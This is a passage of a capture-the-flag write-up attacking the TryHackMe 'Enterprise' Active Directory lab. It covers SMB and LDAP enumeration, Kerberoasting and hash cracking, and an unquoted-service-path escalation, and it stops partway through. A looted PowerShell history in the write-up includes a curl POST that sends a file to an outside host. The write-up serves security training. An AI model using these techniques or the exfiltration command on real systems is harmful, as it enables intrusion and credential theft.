---
layout: post
title: "Enterprise - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - eop
  - windows
  - adctivedirectory
  - smb
  - kerberos
  - service
  - ldap
date: 2023/02/12 02:48:00
thumbnail: /images/TryHackMe/enterprise.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Enterprise
- **Profile:** [tryhackme.com](https://tryhackme.com/room/enterprise)
- **Difficulty:** Hard
- **Description**: You just landed in an internal network. You scan the network and there's only the Domain Controller...

![Enterprise](/images/TryHackMe/enterprise.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap enum4linux-ng smbclient ruby adenum haiti john smbmap remmina metasploit
```

{% chart [width] [height] %}
{
  type: 'polarArea',
  responsive: false,
  data: {
    labels: ['Enumeration', 'Real-Life', 'Well-Known Vulnerabilities', 'Custom Exploitation', 'CTF-Like', 'Scripting'],
    datasets: [{
      label: 'Box rating',
      backgroundColor: [
        'rgba(54, 163, 235, 0.5)',
        'rgba(255, 99, 132, 0.5)',
        'rgba(75, 192, 192, 0.5)',
        'rgba(255, 205, 86, 0.5)',
        'rgba(68, 205, 58, 0.5)',
        'rgba(244, 81, 30, 0.5)'
      ],
      borderColor: [
        'rgba(54, 163, 235, 1)',
        'rgba(255, 99, 132, 1)',
        'rgba(75, 192, 192, 1)',
        'rgba(255, 205, 86, 1)',
        'rgba(68, 205, 58, 1)',
        'rgba(244, 81, 30, 1)'
      ],
      data: [
        4,
        4,
        0,
        5,
        2,
        2
      ]
    }]
  },
  options: {
    legend: {
      position: 'right',
      labels: {
        fontSize: 25
      }
    },
    scale: {
      ticks: {
        beginAtZero: true,
        stepSize: 1,
        suggestedMax: 5
      }
    }
  }
};
{% endchart %}

## Network enumeration

Add a domain entry for this host:

```
$ grep enterprise /etc/hosts
10.10.193.5 enterprise.thm
```

Port and service scan with nmap:

```
# Nmap 7.93 scan initiated Sat Feb 11 18:57:36 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap enterprise.thm
Nmap scan report for enterprise.thm (10.10.193.5)
Host is up, received echo-reply ttl 127 (0.029s latency).
Not shown: 59842 closed tcp ports (reset), 5664 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-11 17:58:02Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-10T17:12:19
| Not valid after:  2023-08-12T17:12:19
| MD5:   ed0aeea31749fb2c6dd40b52bb63c434
|_SHA-1: 0e4fc244394805550c9aae137582e60e6fbb238d
|_ssl-date: 2023-02-11T17:58:59+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
|   Product_Version: 10.0.17763
|_  System_Time: 2023-02-11T17:58:51+00:00
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp  open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Log in to continue - Log in with Atlassian account
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49711/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49844/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-02-11T17:58:52
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled and required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 11 18:59:00 2023 -- 1 IP address (1 host up) scanned in 83.79 seconds
```

The `rdp-ntlm-info` module already give us some DNS information:

```
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
```

We can add this to `/etc/hosts`.

```
$ grep enterprise /etc/hosts
10.10.193.5 enterprise.thm lab.enterprise.thm lab-dc.lab.enterprise.thm
```

## LDAP and SMB enumeration

We can try to get more information through LDAP and SMB with `enum4linux-ng`:

```
$ enum4linux-ng -A lab-dc.lab.enterprise.thm
...
 =============================================================
|    Domain Information via SMB session for enterprise.thm    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAB-DC
NetBIOS domain name: LAB-ENTERPRISE
DNS domain: LAB.ENTERPRISE.THM
FQDN: LAB-DC.LAB.ENTERPRISE.THM
Derived membership: domain member
Derived domain: LAB-ENTERPRISE
...
 =================================================
|    OS Information via RPC for enterprise.thm    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
```

Outside the windows version, we learned nothing new here.

`enum4linux-ng` found not share and `smbmap` show we can connect with null or guest session but can't enumerate the shares.

```
➜ smbmap -H lab-dc.lab.enterprise.thm --no-banner -u '' -p ''

[+] IP: lab-dc.lab.enterprise.thm:445      Name: unknown                   Status: Authenticated
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967

➜ smbmap -H lab-dc.lab.enterprise.thm --no-banner -u 'noraj' -p 'noraj'

[+] IP: lab-dc.lab.enterprise.thm:445      Name: unknown                   Status: Guest session
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
```

But we can successfully retrieve the list at a lower level with

```
$ smbclient -L lab-dc.lab.enterprise.thm -U 'WORKGROUP/noraj%fakepass'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Docs            Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        Users           Disk      Users Share. Do Not Touch!
SMB1 disabled -- no workgroup available
```

Then I use `dolphin` to browse the smb shares conveniently: `smb://lab-dc.lab.enterprise.thm/Users`.

There are a lot of stuff but we don't have the permission for most of it:

```
➜ smbclient '\\lab-dc.lab.enterprise.thm\Users' -U 'WORKGROUP/noraj%fakepass'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Fri Mar 12 03:11:49 2021
  ..                                 DR        0  Fri Mar 12 03:11:49 2021
  Administrator                       D        0  Thu Mar 11 22:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 09:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 23:53:06 2021
  bitbucket                           D        0  Fri Mar 12 03:11:51 2021
  Default                           DHR        0  Fri Mar 12 01:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 09:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018
  LAB-ADMIN                           D        0  Fri Mar 12 01:28:14 2021
  Public                             DR        0  Thu Mar 11 22:27:02 2021

                15587583 blocks of size 4096. 9927088 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
```

There are folders related to `bitbucket` but we can't access them. I quickly used a `tree` command to see what we where able to retrieve. I quickly noticed there was a PowerShell history file.

```
$ cat LAB-ADMIN/AppData/Roaming/Microsoft/Windows/Powershell/PSReadline/Consolehost_hisory.txt
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:EDITED">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit
```

We can't connect with those creds anywhere (tried with ldap, winrm and rdp too):

```
$ cme smb lab-dc.lab.enterprise.thm -u replication -p 'EDITED' -d 'lab.enterprise.thm'
SMB         enterprise.thm  445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:lab.enterprise.thm) (signing:True) (SMBv1:False)
SMB         enterprise.thm  445    LAB-DC           [-] lab.enterprise.thm\replication:EDITED STATUS_LOGON_FAILURE
```

It seems to be a rabbit hole.

```
$ smbclient '\\enterprise.thm\Docs' -U 'WORKGROUP/noraj%fakepass'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Mar 15 03:47:35 2021
  ..                                  D        0  Mon Mar 15 03:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Mon Mar 15 03:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Mon Mar 15 03:45:24 2021

                15587583 blocks of size 4096. 9926354 blocks available
```

Those two documents are password protected and the password from the powershell history doesn't work here either.

Another rabbit hole.

## Bitbucket & OSINT

There is a IIS Server on port 7990.

On http://enterprise.thm:7990/ we can see an Atlassian (the company making Bitbucket) login page.

There is a warning message:

> Reminder to all Enterprise-THM Employees: We are moving to Github!

Using the following dork `"Enterprise-THM" site:github.com` we find a Github organization: https://github.com/Enterprise-THM.

There is an empty repository https://github.com/Enterprise-THM/About-Us and one member https://github.com/Nik-enterprise-dev.

`Nik-enterprise-dev` has only 1 repository with 2 commits, a powershell script with creds inside.

Diff: https://github.com/Nik-enterprise-dev/mgmtScript.ps1/commit/c3c239df75fefbe7563d1d29c963ba1f01e4fe5a

## Authentication enumeration

Now we can re-run `enum4linux-ng` but authenticated and let's save result to a JSON file.

We retrieved all users, groups and the password policy.

```
$ enum4linux-ng -A enterprise.thm -u nik -p 'EDITED'
...
 ===========================================
|    Policies via RPC for enterprise.thm    |
 ===========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
  Password history length: 24
  Minimum password length: 7
  Maximum password age: 41 days 23 hours 53 minutes
  Password properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
  Lockout observation window: 30 minutes
  Lockout duration: 30 minutes
  Lockout threshold: None
Domain logoff information:
  Force logoff time: not set
```

There is no lockout threshold so we can bruteforce as we want.

As I explained on [THTT](https://trove.raw.pm/tools/enum4linux-ng/), we can extract the users and groups with short ruby script.

```ruby
require 'json'

data = JSON.load_file('enum4linux-ng_output.json')

case ARGV[0]
when 'users'
  puts data['users'].map { |_k,v| v['username'] }
when 'users_id'
  puts data['users'].map {|k,v| "#{k},#{v['username']}" }
when 'groups'
  puts data['groups'].map { |_k,v| v['groupname'] }
when 'groups_id'
  puts data['groups'].map {|k,v| "#{k},#{v['groupname']}" }
else
  puts '[+] Usage: <users|users_id|groups|groups_id>'
end
```

```
$ ruby e4l.rb users
Administrator
Guest
krbtgt
atlbitbucket
bitbucket
nik
replication
spooks
korone
banana
Cake
contractor-temp
varg
joiner
```

`adenum` interesting users: domain admins, user with description and kerbeoastable users.

```
➜ adenum -d lab.enterprise.thm -u nik -p 'EDITED'
...

[*] Domain name:    lab.enterprise.thm
[*] Username:       nik
[*] IP Address:     10.10.248.226
[!] SSL supported:  FALSE
[!] SSL connect:    FALSE

[+] Succesfully Authenticated With LDAP

[-] Authentication mechanism
[+] GSSAPI
[+] GSS-SPNEGO
[+] EXTERNAL
[!] DIGEST-MD5                         Consider as weak security protocols
[-] LOGIN                              Plaintext password
[-] PLAIN                              Plaintext password

====================================================
===================== Enum LDAP ====================
====================================================

[-] Users who are Domain Admin
[*] Username: Administrator            CN=Administrator,CN=Users,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: spooks                   CN=spooks,OU=Employees,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: korone                   CN=Korone,OU=Admins,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: banana                   CN=Banana,OU=Admins,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: Cake                     CN=Cake,OU=Admins,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: joiner                   CN=Joiner,OU=Service Accounts,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM

[-] Domain Controllers
[*] Computer: LAB-DC$                  CN=LAB-DC,OU=Domain Controllers,DC=LAB,DC=ENTERPRISE,DC=THM
    [V] Windows Server 2019 Standard 10.0 (17763)

[-] Users with Password Not Expire
[*] Username: Administrator            CN=Administrator,CN=Users,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: Guest                    CN=Guest,CN=Users,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: atlbitbucket             CN=atlbitbucket,CN=Users,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: bitbucket                CN=BitBucker,OU=Service Accounts,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: nik                      CN=nik,OU=Employees,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: banana                   CN=Banana,OU=Admins,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: Cake                     CN=Cake,OU=Admins,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: contractor-temp          CN=Contractor,OU=Employees,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: varg                     CN=Varg,OU=Employees,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[*] Username: joiner                   CN=Joiner,OU=Service Accounts,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM

[-] Users with old password
[!] Username: Administrator            Password last change: 702 days ago 2021-03-11 21:23:37
[!] Username: atlbitbucket             Password last change: 702 days ago 2021-03-11 22:52:53
[!] Username: krbtgt                   Password last change: 701 days ago 2021-03-12 00:31:21
[!] Username: ENTERPRISE$              Password last change: 701 days ago 2021-03-12 00:41:22
[!] Username: bitbucket                Password last change: 701 days ago 2021-03-12 01:20:01
[!] Username: nik                      Password last change: 701 days ago 2021-03-12 01:33:25
[!] Username: replication              Password last change: 701 days ago 2021-03-12 03:01:41
[!] Username: spooks                   Password last change: 701 days ago 2021-03-12 03:35:24
[!] Username: korone                   Password last change: 701 days ago 2021-03-12 03:36:10
[!] Username: banana                   Password last change: 701 days ago 2021-03-12 03:37:11
[!] Username: Cake                     Password last change: 701 days ago 2021-03-12 03:39:42
[!] Username: contractor-temp          Password last change: 701 days ago 2021-03-12 03:44:27
[!] Username: varg                     Password last change: 701 days ago 2021-03-12 03:45:57
[!] Username: joiner                   Password last change: 698 days ago 2021-03-15 01:15:38

[-] Users with an interesting description
[*] Username: contractor-temp          Change password from EDITED

[-] Users with not the default encryption
[*] Username: krbtgt                   Password is in a reversible encryption or in DES !
[*] Username: bitbucket                Password is in a reversible encryption or in DES !

[-] Protecting Privileged Domain Accounts
[!] No entry found !

[-] Not Default Attributes (TEST IN BETA)

[!] No entry found !

[-] Laps Password
[!] No entry found !

====================================================
==================== Attack AD =====================
====================================================

[-] AS-REP Roastable Users
[!] No entry found !

[-] Kerberoastable Users
[*] Username: bitbucket                CN=BitBucker,OU=Service Accounts,OU=Staff,DC=LAB,DC=ENTERPRISE,DC=THM
[+] Hash added to file:                kerbHash.hash

[-] Starting to crack hashs
[!] No entry found !
```

What we can see here:

- `replication` password age is 701 days but has not the attribute `Password Not Expire` and in the password policy the max age is 42 days so the account is expired and the password must be changed (but we can't).

```
$ smbpasswd.py -newpass 'Noraj123!' 'lab.enterprise.thm/replication:EDITED@lab-dc.lab.enterprise.thm'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Authentication failure.
```

- `contractor-temp` has a password in description (we can check the password is valid with `cme`).

```
$ cme smb lab-dc.lab.enterprise.thm -u contractor-temp -p 'EDITED' -d 'lab.enterprise.thm'
SMB         enterprise.thm  445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:lab.enterprise.thm) (signing:True) (SMBv1:False)
SMB         enterprise.thm  445    LAB-DC           [+] lab.enterprise.thm\contractor-temp:EDITED
```

- `bitbucket` is Kerberoastable (we can confirm with `GetUserSPNs`).

```
$ GetUserSPNs.py lab.enterprise.thm/nik:'EDITED'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-12 02:20:01.333272  2021-04-26 17:16:41.570158
```

No need to dump the hash with `GetUserSPNs` as `adenum` already dumped it in kerbHash.hash for us.

## Cracking the kerberoasted hash

[haiti](https://github.com/noraj/haiti) allows us to find the john the ripper or hashcat reference.

```
$ cat kerbHash.hash | haiti -
Kerberos 5 TGS-REP etype 23 [HC: 13100] [JtR: krb5tgs]

$ john kerbHash.hash -w=/usr/share/wordlists/passwords/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
EDITED  (?)
1g 0:00:00:01 DONE (2023-02-12 00:01) 0.6896g/s 1083Kp/s 1083Kc/s 1083KC/s livelife92..liss23
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

## Get user flag

With this user we can spider recursively `\\lab-dc.lab.enterprise.thm\Users\bitbucket` looking for `user.txt` using `cme`.

```
$ cme smb lab-dc.lab.enterprise.thm -u bitbucket -p 'EDITED' -d 'lab.enterprise.thm' --spider Users --spider-folder bitbucket --pattern 'user.txt'
SMB         enterprise.thm  445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:lab.enterprise.thm) (signing:True) (SMBv1:False)
SMB         enterprise.thm  445    LAB-DC           [+] lab.enterprise.thm\bitbucket:EDITED
SMB         enterprise.thm  445    LAB-DC           [*] Started spidering
SMB         enterprise.thm  445    LAB-DC           [*] Spidering bitbucket
SMB         enterprise.thm  445    LAB-DC           //enterprise.thm/Users/bitbucket/Desktop/user.txt [lastm:'2021-03-15 03:49' size:37]
SMB         enterprise.thm  445    LAB-DC           [*] Done spidering (Completed in 124.80464673042297)
```

We can do the same with same with `smbmap`.

```
$ smbmap -H lab-dc.lab.enterprise.thm --no-banner -u 'bitbucket' -p 'EDITED' -s Users -A 'user.txt' -R 'Users\bitbucket'

[+] IP: lab-dc.lab.enterprise.thm:445   Name: unknown                   Status: Authenticated
[+] Starting search for files matching 'user.txt' on share Users.
[+] Match found! Downloading: Users\bitbucket\Desktop\user.txt
```

## Elevation of privilege (EoP)

The account `bitbucket` can be used to connect to smb, rdp and ldap but unlike other accounts seems to be detected as admin capable (Pwn3d!) over RDP.

```
➜ cme rdp lab-dc.lab.enterprise.thm -u usernames.txt -p passwords.txt -d 'lab.enterprise.thm' --no-bruteforce --continue-on-succes
RDP         enterprise.thm  3389   LAB-DC           [*] Windows 10 or Windows Server 2016 Build 17763 (name:LAB-DC) (domain:lab.enterprise.thm) (nla:False)
RDP         enterprise.thm  3389   LAB-DC           [+] lab.enterprise.thm\nik:EDITED
RDP         enterprise.thm  3389   LAB-DC           [-] lab.enterprise.thm\replication:EDITED (STATUS_LOGON_FAILURE)
RDP         enterprise.thm  3389   LAB-DC           [+] lab.enterprise.thm\contractor-temp:EDITED
RDP         enterprise.thm  3389   LAB-DC           [+] lab.enterprise.thm\bitbucket:EDITED (Pwn3d!)
```

So I used `remmina` to connect over RDP. Then open a `PowerShell` terminal.

Let's check for [Unquoted Service Paths](https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths).

```
PS C:\Users\bitbucket> wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v "\"""
Enterprise Bitbucket                                                                AtlassianBitbucket                        C:\Atlassian\Bitbucket\7.11.1\bin\bserv64.exe //RS//AtlassianBitbucket                                               Auto
Atlassian Bitbucket Elasticsearch 7.5.2 (AtlassianBitbucketElasticsearch)           AtlassianBitbucketElasticsearch           C:\Atlassian\Bitbucket\7.11.1\elasticsearch\bin\elasticsearch-service-x64.exe //RS//AtlassianBitbucketElasticsearch  Auto
zerotieroneservice                                                                  zerotieroneservice                        C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe                                                      Auto
```

`zerotieroneservice` service has an unquoted path: `C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe`.

So let's see recursively at which point we can write.

```
PS C:\Users\bitbucket> Get-Acl -Path "C:\" | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\
Owner  : NT SERVICE\TrustedInstaller
Group  : NT SERVICE\TrustedInstaller
Access : CREATOR OWNER Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  AppendData
         BUILTIN\Users Allow  CreateFiles
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
Audit  :
Sddl   : O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:PAI(A;OICIIO;GA;;;CO)(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;CI;LC;;;BU)(A;CIIO;DC;;;BU)(A;OICI;0x1200a9;;;BU)

PS C:\Users\bitbucket> Get-Acl -Path "C:\Program Files (x86)\" | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\
Owner  : NT SERVICE\TrustedInstaller
Group  : NT SERVICE\TrustedInstaller
Access : CREATOR OWNER Allow  268435456
         NT AUTHORITY\SYSTEM Allow  268435456
         NT AUTHORITY\SYSTEM Allow  Modify, Synchronize
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Administrators Allow  Modify, Synchronize
         BUILTIN\Users Allow  -1610612736
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         NT SERVICE\TrustedInstaller Allow  268435456
         NT SERVICE\TrustedInstaller Allow  FullControl
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736
Audit  :
Sddl   : O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:PAI(A;OICIIO;GA;;;CO)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;SY)(A;OICIIO;GA;;;BA)(A;;0x1301bf;;;BA)(A;OICIIO;GXGR;;;BU)(A;;0x1200a9;;;BU)
         (A;CIIO;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;0x1200a9;;;AC)(A;OICIIO;GXGR;;;AC)(A;;0x1200a9;;;S-1-15-2-2)(A;OICIIO;GXGR;;;S-1-15-2-2)

PS C:\Users\bitbucket> Get-Acl -Path "C:\Program Files (x86)\Zero Tier\" | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Zero Tier\
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : BUILTIN\Users Allow  Write, Synchronize
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736
Audit  :
Sddl   : O:SYG:SYD:AI(A;OICI;0x100116;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0
         x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
```

All users have write access in `C:\Program Files (x86)\Zero Tier\` so we could write a binary `C:\Program Files (x86)\Zero Tier\Zero.exe`.

Now we have to check if we have the permission to restart the service.

We can use `Get-ServiceAcl` from https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/.

```
PS C:\Users\bitbucket> "zerotieroneservice" | Get-ServiceAcl | Select -ExpandProperty Access

ServiceRights     : QueryConfig, ChangeConfig, QueryStatus, EnumerateDependents, Start, Stop, PauseContinue, Interrogate, UserDefinedControl, Delete, ReadControl, WriteDac, WriteOwner
AccessControlType : AccessAllowed
IdentityReference : NT AUTHORITY\SYSTEM
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

ServiceRights     : QueryConfig, ChangeConfig, QueryStatus, EnumerateDependents, Start, Stop, PauseContinue, Interrogate, UserDefinedControl, Delete, ReadControl, WriteDac, WriteOwner
AccessControlType : AccessAllowed
IdentityReference : BUILTIN\Administrators
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

